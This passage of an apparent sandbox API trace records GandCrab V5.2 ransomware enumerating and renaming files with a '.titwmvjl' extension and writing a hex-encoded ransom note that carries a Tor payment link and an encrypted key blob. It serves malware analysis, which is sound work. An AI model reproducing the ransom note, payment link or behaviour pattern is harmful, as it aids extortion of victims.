x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.270] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0096.271] CloseHandle (hObject=0x2bc) returned 1 [0096.271] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.272] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.272] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x246)) [0096.272] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.272] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.272] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.272] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned 85 [0096.272] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0096.275] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.275] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.276] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0096.276] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0096.276] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5038f8 [0096.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.276] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.277] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.277] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.277] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.277] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock" [0096.277] lstrlenW (lpString=".titwmvjl") returned 9 [0096.277] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned 85 [0096.277] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.278] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 94 [0096.278] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\d2ca4a09d2ca4deb61a.lock") returned 85 [0096.278] lstrlenW (lpString=".lock") returned 5 [0096.278] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.278] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.278] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.278] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.279] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.279] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0096.279] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0096.279] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0096.279] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0096.279] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.279] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.279] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.280] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.280] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.280] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.280] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.280] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.281] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\TITWMVJL-DECRYPT.txt") returned 95 [0096.281] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0096.283] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x